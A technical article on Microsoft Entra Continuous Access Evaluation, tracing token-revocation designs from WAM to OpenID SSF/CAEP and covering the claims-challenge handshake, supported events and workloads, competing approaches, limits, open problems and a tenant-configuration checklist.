Walk forward through the genealogy of session enforcement and the breakthrough in Section 5 stops looking like a stroke of genius and starts looking like the only move the design space had left. Four generations, each killed by a documented limit of the previous one.

Generation 0: WAM (pre-2012)

Per-request synchronous round-trip to a Policy Decision Point. Instant revocation; chatty bottleneck; no federation. Killed by cloud-scale request rates and the rise of cross-organization SaaS, where the protected resource and the policy authority no longer lived in the same trust domain. WAM remains valuable in single-tenant enterprise contexts, but for the public-cloud API mesh it cannot scale.

Generation 1: Static-expiry JWT (2012-2020)

Self-contained signed bearer tokens validated locally at the resource server. Revocation approximated by expiry per RFC 6749 [@rfc-6749]. Throughput scales; federation works; revocation is acceptable when the lifetime is short and the threat model is benign. Killed by (a) the fired-employee window, (b) the three failed Section 3 patches, and (c) the philosophical pressure from Zero Trust to treat sessions as continuously re-evaluated.

Generation 2: Microsoft CAE (limited preview April 2020, GA January 10, 2022)

The first production solution. Limited preview launched in April 2020 with Alex Weinert's Moving towards real time policy and security enforcement announcement [@weinert-2020-04-real-time]. Expanded public preview October 2020 [@simons-2020-10-expanded-preview; @vansurksum-2020-10-10]. General Availability January 10, 2022, announced by Alex Simons, Corporate VP for Program Management in the Microsoft Identity Division [@simons-2022-01-ga-rss].

The architecture is a private push-subscription channel between Entra and a small set of Microsoft 365 resource providers, with a wire-level handshake (the claims challenge) for telling the client to re-acquire a token reflecting new state. Access-token lifetime extends from the default 1 hour to up to 28 hours specifically for CAE-aware sessions [@ms-cae-concept]. We will unpack the mechanism in Section 5.

The Gen-2 limitation that motivated Gen 3: the wire format is Microsoft-internal. A SaaS vendor that wants the same revocation properties for its own resource provider cannot use Microsoft's CAE channel. The protocol does not federate.

Generation 3: OpenID SSF 1.0 + CAEP 1.0 + RISC 1.0 (Final Specifications, September 2, 2025)

The OpenID Foundation generalized the Microsoft pattern into a vendor-neutral specification. On September 2, 2025, three Final Specifications were approved: the Shared Signals Framework 1.0 (SSF), the Continuous Access Evaluation Profile 1.0 (CAEP), and the Risk and Incident Sharing and Coordination 1.0 (RISC) [@openid-three-final-specs; @openid-sharedsignals-wg].

The wire envelope is IETF RFC 8417's Security Event Token (SET), published in July 2018 by Phil Hunt (Oracle), Michael Jones (Microsoft), William Denniss (Google), and Morteza Ansari (Cisco) [@rfc-8417]. A SET is a signed JWT carrying a single security event. The transport layer is RFC 8935 push (POST over TLS from transmitter to receiver) and RFC 8936 poll (recipient-initiated retrieval), both published November 2020 by Annabelle Backman and collaborators [@rfc-8935; @rfc-8936]. SSF defines the subscription model -- streams, subjects, transmitter and receiver metadata endpoints. CAEP and RISC define the vocabulary of events that can ride that envelope.

IETF RFC 8417's standardized signed-JWT envelope for transmitting security-relevant events between systems. Each SET carries exactly one event with a well-defined event-type URI; the envelope is signature-protected and timestamp-bearing. SET is the wire format underlying CAEP, SSF, and RISC, as well as Microsoft's internal CAE protocol [@rfc-8417].

RFC 8417 was a cross-vendor IETF effort that pre-dated the OpenID Shared Signals working group by a year. Phil Hunt was at Oracle; Michael Jones at Microsoft; William Denniss at Google; Morteza Ansari at Cisco. The envelope-only design -- leaving event vocabularies to higher-layer profiles -- is what allowed both Microsoft's internal protocol and the OpenID profiles to converge on the same wire format without coordination [@rfc-8417].

flowchart TD L4["Layer 4: Event vocabularies
CAEP 1.0 (session) and RISC 1.0 (account)"] L3["Layer 3: Subscription and stream model
OpenID SSF 1.0"] L2["Layer 2: HTTP transport
RFC 8935 push, RFC 8936 poll"] L1["Layer 1: Signed event envelope
RFC 8417 Security Event Token (SET)"] L4 --> L3 L3 --> L2 L2 --> L1

The generation chain has a documented engineering reason for each transition. The comparison matrix below pulls the essentials together.

Approach	Year	Revocation latency	Strengths	Weaknesses
WAM (Gen 0)	pre-2012	Instant	Authoritative state, instant enforcement	No federation, per-request bottleneck
Static-expiry JWT (Gen 1)	2012-2020	Up to token lifetime (1h-24h)	O(1) RP validation, federation works	No revocation; fired-employee window
Short-lifetime patch	mid-2010s	Minutes	Conceptually simple	Load amplification, window remains, UX degradation
RFC 7662 introspection	2015 onward	Instant	Standardized, works for opaque tokens	AS becomes per-request critical path
Microsoft CAE (Gen 2)	2020-2022	Up to 15 min critical; instant IP	Push, decoupled from request rate, long tokens safe	Microsoft-internal protocol; tiny RP set
OpenID SSF/CAEP (Gen 3)	2025 onward	Vendor-dependent	Vendor-neutral standard, cross-SaaS	Receiver adoption still early

flowchart LR G0["Gen 0: WAM
per-request PDP"] G1["Gen 1: Static-expiry JWT
RFC 6749 (2012)"] G2["Gen 2: Microsoft CAE
GA January 2022"] G3["Gen 3: OpenID SSF and CAEP
Final September 2025"] G0 -- "cloud scale and federation" --> G1 G1 -- "fired-employee window, patches fail" --> G2 G2 -- "Microsoft-only, no cross-SaaS" --> G3

Knowing the lineage is not knowing the trick. What is the actual mechanism CAE deploys -- the thing that turns this standards-history arc into a feature that ships and makes 28-hour tokens defensible? It has three parts, and once you see them together, you understand why long tokens are safe.

5. Subscription, Claims Challenge, Extended Lifetime

Three innovations, none new in isolation, all unprecedented in combination. This is the section where you see the trick.

Atul Tulshibagwale's 2019 framing names the move: "Our vision for continuous access evaluation is based on a publish-and-subscribe ('pub-sub') approach... It's complementary to federated or cert-based authentication... It's not as chatty as WAM... It doesn't impact latency for user access" [@tulshibagwale-2019-google-blog]. Pub-sub is the third option between WAM's per-request chattiness and RFC 6749's fire-and-forget. Subscription is the channel; claims challenge is the wire-level handshake; extended lifetime is the user-experience prize.

Part 1: Subscription

Microsoft's CAE concept page describes the architecture in one sentence that rewards close reading:

Timely response to policy violations or security issues really requires a 'conversation' between the token issuer Microsoft Entra, and the relying party (enlightened app). -- Microsoft Learn, *Continuous access evaluation in Microsoft Entra* [@ms-cae-concept]

The word conversation is the architecture. The relying party (a CAE-aware Microsoft 365 workload such as Exchange Online) subscribes to a finite, documented set of critical events for the subjects it cares about. Entra pushes events to the RP as state changes. State is cached at the RP. On the hot path -- the per-request data plane -- the RP does an O(1) JWT signature verification plus an O(1) hash-table lookup of cached revocation state. No back-channel round-trip on the hot path. The 28-hour token costs no more to validate than the 1-hour token it replaced [@ms-cae-concept].

This is the move that defeats RFC 7662. The state lives at the RP, not at the AS. The control-plane cost scales with the rate of events, not the rate of requests. Push, not poll.

Part 2: The claims challenge

When state at the RP changes -- because a push event has arrived saying "this user's password has been reset" -- the RP cannot reach into a request that has already been accepted and is being served. CAE is in-band with the next request, not the current one. The next time the client presents the stale token, the RP rejects it with HTTP 401 and a specific header:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer error="insufficient_claims",
                  claims="eyJhY2Nlc3NfdG9rZW4iOnsiYWNyc..."

The claims parameter is a base64url-encoded JSON object that tells the client what to re-acquire from the IdP. The Microsoft Authentication Library (MSAL) on the client decodes the challenge transparently and requests a new access token from Entra with the indicated claims. Entra either issues a fresh CAE-aware token (if authorization still holds) or rejects, forcing interactive re-authentication. The client retries the original API call with the new token [@ms-cae-app-resilience].

The HTTP-level mechanism by which a CAE-aware resource provider signals to a client that the presented token must be re-acquired with fresh state. The challenge is conveyed as a `WWW-Authenticate: Bearer error="insufficient_claims"` header with a base64url-encoded `claims` parameter; current Microsoft Authentication Library (MSAL) releases decode and handle it automatically when the client app registration declares the `xms_cc` capability `["cp1"]` [@ms-cae-app-resilience].

This is the move that defeats RFC 7009. Revocation is initiated by the resource provider's view of the IdP's state, not by the token holder. A fired employee's client cannot opt out of the claims challenge; the RP will not serve any further request until a fresh token arrives that reflects the post-revocation state.

{` // A real-shape WWW-Authenticate header from a CAE-aware resource provider. // The 'claims' parameter is base64url-encoded JSON. const header = 'Bearer error="insufficient_claims", claims="eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTcyMDQ4MDA0MyJ9fX0="';

// Extract the claims parameter const match = header.match(/claims="([^"]+)"/); const b64 = match ? match[1] : null;

// base64url decode (Node 'Buffer' would work; here we use the browser-safe approach) function b64urlDecode(s) { s = s.replace(/-/g, '+').replace(/_/g, '/'); while (s.length % 4) s += '='; return atob(s); }

const claimsJson = b64urlDecode(b64); console.log(JSON.parse(claimsJson)); // { // "access_token": { // "nbf": { // "essential": true, // "value": "1720480043" // } // } // } // MSAL reads this and requests a new token whose 'nbf' (not-before) is at least // the supplied timestamp -- i.e., a token issued after the state change. `}

The nbf (not-before) claim challenge is the most common shape: the RP is telling the client "give me a token issued after this moment." The client requests one. Entra checks current state -- did the user get disabled? did the password get reset? did the risk score elevate? -- and either issues or denies. The wire format is simple enough to inspect in a browser tab, which is part of why the architecture has been able to standardize: there is no magic to reverse-engineer.

Part 3: Extended lifetime, the prize

The first two parts buy you the third. Once revocation is push-based and the claims challenge gives the RP a way to evict stale tokens within seconds of seeing a control-plane event, the expiry timer stops carrying the security weight. Tokens can live longer because the expiry is no longer the only revocation mechanism.

Microsoft documents the upper bound as "up to 28 hours" for CAE-aware sessions [@ms-cae-concept; @ms-cae-app-resilience]. The default for non-CAE-capable clients remains 1 hour. This is the move that defeats the short-lifetime patch: the IdP load profile collapses because tokens refresh once a day, not on a per-minute cycle, and the revocation window is dramatically smaller -- not because expiry shrank, but because the channel now does the revocation work expiry used to do.

Key idea: Long-lived access tokens are safe only when paired with a near-real-time revocation channel. CAE is the channel. Subscription provides the push, the claims challenge is the in-band handshake the push enables, and the 28-hour lifetime is what the channel buys -- not what the channel costs.

The full round trip

The three parts interlock. The complete flow, from a state change at Entra to a re-validated request, runs end-to-end through every layer the article has named.

sequenceDiagram participant Admin participant Entra as Microsoft Entra participant Client as Client (MSAL) participant RP as Resource Provider (e.g. Exchange Online) Admin->>Entra: Disable user account Entra->>RP: Push critical-event SET (account disabled) Note over RP: Updates cached revocation state for (sub, tenant) Client->>RP: GET /me/messages (Authorization Bearer old token) Note over RP: Validates JWT signature O(1), checks cached state RP-->>Client: 401 plus WWW-Authenticate insufficient_claims Note over Client: MSAL parses claims challenge from header Client->>Entra: Token request with claims Note over Entra: Checks current user state, account is disabled Entra-->>Client: 400 invalid_grant or interactive re-auth required Note over Client: User cannot recover, session terminates

Three moves, one design. Remove any one and the system collapses. Subscription without a claims challenge gives you push events the RP cannot act on at the wire. Claims challenge without subscription gives you a 401 mechanism with no information to decide when to fire it. Extended lifetime without either gives you Generation 1's fired-employee window. The 28-hour token is not the cost of CAE; it is what CAE purchases.

This is the design. What does it actually do in production today, and where does it stop?

6. CAE as Deployed in Microsoft Entra (2026)

Concrete answers to concrete questions. Which events trigger CAE? Who participates? What is the actual SLA? How long do tokens actually live? No marketing language; only what Microsoft Learn currently documents.

Critical event evaluation events

Microsoft Learn lists exactly five events that drive critical event evaluation at the IdP-to-RP boundary [@ms-cae-concept]:

A user account is deleted or disabled.
A password for a user is changed or reset.
Multi-factor authentication is enabled for the user.
An administrator explicitly revokes all refresh tokens for a user.
High user risk is detected by Microsoft Entra ID Protection.

These five events propagate from Entra to the participating CAE-aware resource providers via the push channel. Microsoft's published service-level objective is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. That is not the same as "instant." The phrase to avoid is "CAE delivers instant revocation"; the accurate phrase is "CAE delivers near-real-time revocation, typically within 15 minutes for critical events."

A separate scenario -- Conditional Access policy evaluation -- covers network and IP-location changes. Here the SLA is different: IP-location enforcement is instant per Microsoft's published documentation [@ms-cae-concept]. The difference is mechanical. IP location is a property the RP sees directly on every request (the source IP of the incoming HTTP connection); the RP can compare it against the location constraints attached to the session and reject locally with no propagation delay. Critical events have to travel from Entra to the RP through the event channel, and that travel has a 15-minute budget at Microsoft 365 scale.

Event	Source	Propagation	Notes
Account deleted or disabled	Entra ID directory	Up to 15 min	Honored by Exchange Online, SharePoint Online, Teams, Graph (CA)
Password changed or reset	Entra ID directory	Up to 15 min	Same RP set
MFA enabled for user	Entra ID directory	Up to 15 min	Same RP set
All refresh tokens revoked (admin)	Entra ID admin action	Up to 15 min	Same RP set
High user risk detected	Entra ID Protection	Up to 15 min	SharePoint Online does not honor user-risk events [@ms-cae-concept]
IP location changed (CA policy)	Resource-provider observation	Instant	Conditional Access policy evaluation path; strict location enforcement [@ms-strict-location-enforcement]

Note: Microsoft Defender for Endpoint and Microsoft Intune (MDM) are signal sources into Conditional Access. They contribute to the risk score and device-compliance state that drive CA policy decisions, but they are not CAE-consuming resource providers. They do not subscribe to Entra critical-event notifications and they do not enforce the claims-challenge handshake on token-bearing requests. The CAE-aware RP set is exactly: Exchange Online, SharePoint Online, Microsoft Teams, and Microsoft Graph (the last only for Conditional Access policy evaluation) [@ms-cae-concept]. If you read older deck slides or vendor blog posts that list MDE or Intune as CAE participants, they are conflating the signal-source role with the resource-provider role.

The SharePoint Online user-risk caveat is a concrete example of why "CAE-aware" is not a binary property at the workload level. SharePoint Online is fully CAE-aware for the first four critical events on the list; it just does not subscribe to user-risk events specifically. The lesson is that you must read the per-workload documentation carefully when designing controls that depend on a specific event's enforcement [@ms-cae-concept].

Workloads that participate

The CAE-aware resource-provider set, per Microsoft Learn [@ms-cae-concept]:

Exchange Online -- full CAE consumer (initial implementation, October 2020).
SharePoint Online -- full CAE consumer, with the user-risk caveat noted above.
Microsoft Teams -- full CAE consumer (initial implementation), per Alex Simons's January 2022 GA announcement [@simons-2022-01-ga-rss].
Microsoft Graph -- consumes Conditional Access policy evaluation events (the IP-location instant path); narrower scope than the M365 productivity workloads.

Client-side support is also explicit. Microsoft's compatibility tables in the CAE concept page enumerate which client and server combinations are Supported, Partially supported, or Not Supported on every major operating system and form factor [@ms-cae-concept]. Office web apps against SharePoint Online and Exchange Online are documented as Not Supported on several combinations; every Teams client surface shows as Partially supported. The point is not that CAE is broken on these surfaces -- it is that Microsoft documents the rough edges in primary source, and tenant administrators who care about specific scenarios must read the table.

Tokens and clients

The default access-token lifetime for CAE-aware sessions is up to 28 hours; the default for non-CAE-capable clients remains 1 hour [@ms-cae-concept; @ms-cae-app-resilience]. Client support requires a current Microsoft Authentication Library (MSAL) release on the target platform: the 4.x line for .NET and JavaScript; the appropriate current line for Python, Java, Android, iOS, or macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates per-SDK guidance [@ms-cae-app-resilience]. The app registration must also declare the xms_cc client capability with value ["cp1"] to advertise CAE-handling support to the IdP [@ms-cae-app-resilience].

An app-registration claim by which a client advertises support for CAE-aware token issuance. The canonical wire-level value in the issued JWT is lowercase `"cp1"` (Microsoft's developer docs show both `"cp1"` and `"CP1"`; negotiation is case-insensitive but the token claim is lowercase). It signals that the client's MSAL implementation can decode and act on a `WWW-Authenticate: Bearer error="insufficient_claims"` response by parsing the `claims` parameter and re-acquiring a token. Without it, Entra issues the default 1-hour token and the resource provider falls back to standard expiry [@ms-cae-app-resilience]. A Microsoft 365 workload (Exchange Online, SharePoint Online, Teams, or Microsoft Graph for Conditional Access policy) that consumes Entra's critical-event notifications and enforces them on subsequent token-bearing requests via the claims-challenge handshake. This is a narrower meaning than the generic OAuth 2.0 sense of "resource server"; in CAE, "resource provider" specifically means a workload that has implemented the CAE participation contract with Entra [@ms-cae-concept]. Microsoft documents an *upper bound* on token lifetime. The actual lifetime issued for any given session is variable and can be shorter. CAE-aware sessions can also be refreshed silently as long as the channel signals nothing has changed. Practically, this means most users with CAE-aware clients on M365 productivity workloads almost never see an interactive re-authentication prompt during normal working hours [@ms-cae-concept].

A migration note for older tenants

Tenant administrators with Conditional Access policies that pre-date GA may carry legacy "strict location enforcement" preview settings. Microsoft has since migrated the feature into GA, and the current Microsoft Learn page Strictly enforce location policies using continuous access evaluation documents the post-migration configuration model [@ms-strict-location-enforcement]. Administrators should verify their policies after each major Conditional Access feature wave to ensure preview-to-GA migrations have been picked up.

CAE is one approach among several. Where does it sit relative to introspection-per-request, identity-aware proxies, DPoP, and the cross-vendor OpenID standard? The design space is small enough to map cleanly.

7. Competing Approaches and Their Relation to CAE

Five named methods occupy adjacent positions in the design space. Some compete; some compose. The map matters because deployments that confuse the two get wrong answers.

CAE versus OpenID SSF and CAEP 1.0

Same architecture, different implementations. Microsoft CAE solves the Microsoft estate via a Microsoft-internal protocol; OpenID SSF and CAEP solve the cross-vendor SaaS long tail via a public standard atop RFC 8417 [@openid-three-final-specs; @openid-ssf-1_0-final; @openid-caep-1_0]. The two are convergent rather than rivalrous: Microsoft is moving toward also acting as an SSF transmitter and receiver alongside its first-party CAE protocol, and other vendors are building SSF receivers that can consume signals from any transmitter, including Microsoft.

The Authenticate 2025 interop event in October 2025 was the first whose tested text was the Final-Specification version of SSF [@openid-authenticate-2025-interop]. Multi-vendor SSF and CAEP interoperability has been demonstrated at successive Gartner IAM Summit interop events as well. At the March 2024 London summit, SGNL's CAEP Hub interoperated as both transmitter and receiver with Cisco Duo, Okta, SailPoint, and Helisoft on the session-revoked CAEP event [@sgnl-2024-04-interop]. Okta's own blog characterizes the March 2025 London summit as "a significant industry shift toward interconnected, real-time security" with "interoperable implementations from pioneers like Okta, Google, IBM, Omnissa, SailPoint, and Thales" [@okta-shared-signals].

Tim Cappalli, who joined Okta after his time at Microsoft, co-chairs the OpenID Shared Signals Working Group alongside Atul Tulshibagwale (SGNL, formerly Google) [@tulshibagwale-sgnl-2023-08-qanda; @openid-sharedsignals-wg]. The cross-vendor co-chair arrangement is part of why the Final Specifications passed without significant vendor pushback: the people doing the standardization had visibility into both Microsoft's and Google's prior implementations.

CAE versus RFC 7662 introspection

Parallel paths, not competitors. RFC 7662 introspection [@rfc-7662] continues to be the right answer for opaque-token systems and on-premises IdPs where the AS-to-RP per-request round-trip is acceptable. CAE wins at hyperscale public-cloud volumes specifically because it inverts the per-request dependency: state pushes to the RP once and lives in cache; the data plane does not consult the AS on every request. If you are building a B2B integration with a small RP count and a few hundred requests per second, RFC 7662 is fine. If you are building Exchange Online, it is not.

CAE versus DPoP and mTLS-bound tokens

Complementary, not competitive. The threat model for CAE is stale authorization: the authorization decision at sign-in is no longer accurate, because the user has been disabled, their password has been reset, their risk score has changed, or their network location has shifted. The threat model for proof-of-possession is stolen tokens: an attacker holding a bearer token that was legitimately issued to a different party.

RFC 9449, OAuth 2.0 Demonstrating Proof of Possession (DPoP), published September 2023 by Daniel Fett and collaborators [@rfc-9449-dpop], binds an access token to a client-held key pair: a DPoP-bound token can only be replayed by an attacker who also stole the private key. RFC 8705, OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens, published February 2020 by Brian Campbell and collaborators [@rfc-8705-mtls], does the same thing using mTLS certificates. Both are sender-constrained-token mechanisms; both close the bearer-token-replay attack surface.

CAE does not address token theft. A stolen CAE-aware token is still usable by the attacker until the IdP or RP becomes aware of the compromise. A DPoP-bound CAE-aware token closes both gaps: the attacker cannot replay it, and even if they could, the channel can revoke it within minutes. The correct deployment pattern is to combine CAE with DPoP or mTLS-binding where the application threat model warrants both.

CAE versus BeyondCorp-style identity-aware proxies

Different architectural layer. Identity-aware proxies (Google IAP, Cloudflare Access, AWS Verified Access) sit in front of the resource server and enforce policy at the proxy. They have full visibility into per-request state and can do instant revocation by terminating the connection at the proxy when policy changes. This is correct for proxy-fronted workloads but does not scale to the long tail of API surfaces that cannot or will not sit behind a proxy. CAE pushes the enforcement into the resource server itself, which is what lets it work for native cloud APIs and federated SaaS where the proxy model would not.

A note on PRT theft

CAE does not address attacks at the Primary Refresh Token (PRT) layer. The PRT is a long-lived refresh credential Windows uses to mint access tokens silently from a logged-in session. A stolen PRT can mint CAE-aware access tokens that are, from Entra's perspective, legitimately issued -- the attacker holds a credential the IdP still recognizes. CAE will only catch this if the user is revoked, the password is reset, or one of the other critical events fires after the PRT theft. The Pass-the-PRT attack class therefore bypasses CAE entirely; defenses for that layer are out of scope here and are a separate engineering problem.

Mapping the design space

The table is the cleanest way to see who competes with whom and who composes with whom.

Approach	Solves	Composes with CAE	Competes with CAE
OpenID SSF/CAEP 1.0	Cross-vendor revocation	Yes (CAE is a Microsoft implementation of the same pattern)	No
RFC 7662 introspection	Opaque-token revocation at modest scale	Parallel path	At hyperscale only
DPoP (RFC 9449)	Sender-constrained tokens	Yes (compose for full coverage)	No
mTLS-bound tokens (RFC 8705)	Sender-constrained tokens	Yes (compose for full coverage)	No
Identity-aware proxy	Per-request policy at the proxy edge	Composes for proxy-fronted workloads	Different layer
Short access-token lifetime	Reduces revocation window mechanically	Falls back when CAE not available	Yes, and loses on the trade

The reader who came to this article expecting a binary contest -- "which one wins?" -- has the wrong frame. The actual answer is that CAE is one move in a layered defense, and most production deployments will end up composing it with DPoP or mTLS for token binding, falling back to short lifetimes for non-CAE clients, and continuing to use introspection for opaque-token internal APIs.

That handles deployment. But every architecture has limits. The reader has spent six sections climbing; the next section is the humility beat where the descent begins.

8. Theoretical Limits: What CAE Cannot Do

Every architecture has a floor. The reader has spent six sections climbing; this is where the limits show up -- not as vendor laziness, but as physics, scale, and trust topology.

Limit 1: cannot revoke a token already in flight

Once a request has been accepted and is being served by the resource provider, CAE cannot reach into the RP's execution thread and abort it. The revocation applies to the next request. A long-running operation -- a bulk Outlook export, a large SharePoint upload -- that began at 10:23:00 may complete normally even if the user is disabled at 10:23:01. The revocation takes effect the next time the client presents the token [@ms-cae-concept]. For most use cases the in-flight window is sub-second and the consequence is negligible; for long-running data egress, it matters.

Limit 2: cannot beat the 15-minute critical-event SLA for most events

Microsoft's published SLA is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. Only IP-location enforcement is instant. The 15-minute number is not a fundamental limit; it is engineering economics at hyperscale. Fanning out an event to every CAE-aware RP for every potentially affected subject across Microsoft 365's global infrastructure is what produces the budget. Smaller-scale deployments demonstrate much better numbers: TigerIdentity's commercial deployment self-reports sub-second end-to-end revocation in a tuned CAEP receiver configuration [@tigeridentity-caep-explained]. The architecture allows sub-second; Microsoft's particular deployment chooses 15 minutes because the alternative at its fan-out scale is prohibitively expensive.

The strict physical floor sits below even the tuned implementations. An RP cannot enforce a revocation it has not yet learned about. The one-way network latency $L$ between IdP and RP sets the absolute minimum: with a transcontinental $L \approx 70,\text{ms}$, no push protocol can revoke faster than that, and pull protocols are necessarily worse. In practice, queuing, scheduling, and event-fanout dominate $L$ at scale -- but the floor remains.

Key idea: The 15-minute SLA is not a fundamental limit; it is engineering economics at hyperscale. Sub-second is feasible at smaller fan-outs, and is the direction of travel as receiver implementations improve and as Microsoft's own event-distribution infrastructure ages well. But the strict physical floor is the network latency between IdP and RP; no cooperative protocol can do better than that.

Limit 3: cannot cover non-CAE-aware clients or resource providers

CAE is a cooperative protocol. Both the client (via the xms_cc=cp1 capability declaration) and the resource provider (via implementing the participation contract) must be CAE-aware [@ms-cae-app-resilience]. A non-CAE client receives a default 1-hour token and never sees a claims challenge; it relies on standard expiry. A non-CAE RP silently falls back to standard token expiry as well; the IdP's events have no consumer. The CAE-aware portion of the estate enjoys the new contract; the rest carries the old security debt unchanged.

This is why audit posture matters. A tenant administrator who wants to argue that revocation latency for their workforce is "under 15 minutes" must be able to demonstrate that the client and RP combinations the workforce actually uses are CAE-aware. Microsoft's compatibility tables [@ms-cae-concept] document several Office-web-app and OneDrive-Win32-versus-SharePoint combinations as Not Supported or Partially supported; those gaps are part of the tenant's effective revocation profile, not someone else's problem.

Limit 4: cannot help if the resource provider itself is compromised

Revocation state lives at the RP. A compromised RP can simply ignore revocation events: keep serving requests against tokens Entra has signaled are invalid; misreport its own subscription state; drop events on the floor. CAE is a cooperative protocol between trustworthy parties. It is not a defense against an RP that has been pwned. The OpenID SSF specification addresses this implicitly by defining receiver requirements (verification events, stream-control endpoints, signature verification on SETs), but no receiver requirement can compel a compromised receiver to obey the protocol.

The threat model implication: an attacker who has compromised an RP does not need to bypass CAE. They simply do not implement it from the inside, and the protocol's design has no remedy. RP integrity is a prerequisite, not a guarantee.

Limit 5: cannot revoke a stolen PRT before it mints a new access token

As noted in Section 7, the Primary Refresh Token sits outside CAE's scope. A stolen PRT mints new CAE-aware access tokens that Entra treats as legitimately issued, because from Entra's perspective they are legitimately issued -- the attacker is presenting a credential the IdP recognizes. CAE catches PRT theft only when one of the five critical events fires after the theft. If the attacker exfiltrates a PRT, refreshes a token, and immediately uses it, the access token is valid and the revocation channel has nothing to revoke.

The SharePoint Online user-risk-event caveat is a useful concrete example of the per-feature limit pattern. Even within the four CAE-consuming RPs, feature support is not uniform; you cannot reason about CAE as a single boolean property at the workload level. Every event you care about must be checked against the specific RP that will enforce it [@ms-cae-concept].

The bounded design space

Put together, the five limits draw the perimeter of what CAE can do. It cannot stop in-flight requests. It cannot beat network latency at the strict floor or 15 minutes at Microsoft's chosen operating point. It cannot help non-participating clients or RPs. It cannot fix a compromised RP. It cannot revoke PRT-layer credentials before they mint new tokens. The honest summary is that the design space is bounded -- the reader who internalizes the five limits has a calibrated sense of what is fundamentally possible, and can stop expecting CAE to be a single fix for revocation in all situations.

The limits also map the open frontier. If those are the structural constraints, what are the OpenID Foundation and the SaaS long tail working on in 2026?

9. Open Problems (2026)

Final Specifications are necessary but not sufficient. CAEP 1.0, SSF 1.0, and RISC 1.0 were approved on September 2, 2025 [@openid-three-final-specs]. The question for 2026 is what adoption and extension look like. Five live problems.

1. Third-party SaaS receiver-adoption depth

The Final Specifications give every SaaS vendor a clean target to build against. The question is whether they will. Google Workspace shipped its SSF receiver in Closed Beta, supporting only the session-revoked CAEP event at launch [@google-workspace-ssf-api]. That is one event out of CAEP 1.0's eight. The SaaS long tail -- Workday, ServiceNow, GitHub Enterprise, Atlassian, Salesforce -- has not, as of the Final Specification's first anniversary, shipped public receivers.

For the "fired employee with N SaaS apps" scenario to be fully solved, every SaaS app in the user's bundle has to be a CAEP receiver subscribed to events from the enterprise IdP. The architecture is in place; the integration work is per-vendor and per-customer. This is the largest single determinant of CAE's real-world value over the next several years.

Note: The Microsoft 365 estate enjoys near-complete CAE coverage because Microsoft built both the IdP and the resource providers. The cross-vendor story is fundamentally a coordination problem: every receiver has to be built, deployed, and configured to subscribe to events from every transmitter the enterprise uses. SSF 1.0 makes the integration tractable; it does not make the work disappear. Watch receiver coverage in 2026-2028 as the leading indicator of CAE's industry-wide impact.

2. CAE for non-human and agent identities

CAEP subject identifiers assume user-shaped or device-shaped subjects [@openid-caep-1_0]. Workload identities, service principals, and emerging AI-agent identities sit outside the model as currently profiled. An agent acting on behalf of a user, with its own identity and its own session, is not yet covered by a Final-Specification profile. The Microsoft Entra Conditional Access for Agent Identities workstream is a documented Microsoft Learn surface as of 2026 [@ms-conditional-access-agent-id] and is one of the workstreams that will eventually produce a CAEP profile for non-human subjects, but as of mid-2026 the cross-vendor standardization gap is open.

3. Cross-IdP federation of SSF streams

When tenant A federates to tenant B, the event-flow path crosses a trust boundary the current Final Specifications do not explicitly profile. If a user is disabled in tenant A's IdP, how does the revocation event reach the resource providers downstream in tenant B? The pieces -- transmitter, receiver, SET envelope, signed events -- are all in place; what is missing is the canonical profile for cross-IdP federation of SSF streams. This is a 2026-2027 OpenID Foundation workstream rather than a Final-Specification gap.

4. Bidirectional signal sharing

Today's CAE and CAEP deployments are largely IdP-as-transmitter, RP-as-receiver. The full vision is bidirectional: an RP that detects anomalous behavior (unusual access patterns, suspected automation, post-authentication risk signals) should be able to transmit those signals back to the IdP, which can then incorporate them into the next authorization decision. SGNL and similar vendors are building toward this model. The Final Specifications support bidirectional flow at the protocol level; the policy and operational pieces -- who trusts whom, what events flow which way, how an IdP weighs signals from an RP -- are still being worked out.

5. Reason-code convergence between CAEP and RISC

CAEP 1.0 and RISC 1.0 cover overlapping ground around credential mutation. CAEP defines a credential-change event; RISC defines account-credential-change-required [@openid-caep-1_0; @openid-sharedsignals-wg]. Implementers must choose, and vendor extensions proliferate where the spec leaves room. Reason-code convergence between the two profiles is incomplete; some receivers will subscribe to both streams to be safe, others will pick one and hope upstream transmitters agree. Over time the WG will likely consolidate; for 2026, the practical guidance is to support both event vocabularies in receiver code.

The first interoperability event whose tested text was the Final-Specification version of SSF took place at Authenticate 2025 in Carlsbad, California, October 13-15, 2025, hosted by the FIDO Alliance and coordinated by the OpenID Foundation Shared Signals Working Group [@openid-authenticate-2025-interop]. The event required that all participants with an SSF Transmitter pass the OpenID Foundation's free, open-source conformance tests. This was the fourth in a series of Gartner-IAM and Authenticate interops since March 2024, and the first conducted after SSF 1.0 was approved Final on September 2, 2025. The list of vendor participants has grown at each event; cross-vendor receiver coverage is the metric to watch.

Given all this -- the architecture, the limits, the open frontier -- what should you actually do this week in your tenant and your code?

10. Turning CAE On in Your Tenant and Your Code

Three audiences, three checklists. Each section is what an engineer in that role needs to confirm or change to make CAE work in their environment.

For the tenant administrator

CAE has been auto-enabled by default for new Microsoft Entra tenants since the January 2022 GA [@simons-2022-01-ga-rss]. Tenants created before then may need to verify enablement in Conditional Access -> Session controls -> Customize continuous access evaluation. The relevant signals to check:

CAE enablement state. Confirm that the tenant-wide CAE policy is set to Enabled rather than Disabled or Strict location.
Per-policy disable flags. Some legacy CA policies carry per-policy CAE overrides. Audit any that explicitly disable CAE; the right default is to honor it.
Strict location enforcement migration. Tenants with pre-GA "strict location enforcement" preview settings should verify that the policy has migrated to the current GA configuration model documented in Microsoft Learn [@ms-strict-location-enforcement].
Audit log baselines. Sign-in logs surface signInEventTypes with CAE-related entries; refresh-token issuance events and revocation events appear in the Entra ID audit log. Build a baseline before changing policies so you can detect drift.

For the MSAL client developer

The client side has three things to confirm and one thing to test:

MSAL version. Use a current MSAL release on your client platform: 4.x for MSAL.NET and MSAL.js; the appropriate current line for MSAL Python, MSAL Java, MSAL Android, and MSAL for iOS/macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates the per-SDK guidance [@ms-cae-app-resilience]. Earlier major-version lines do not handle the claims challenge transparently.
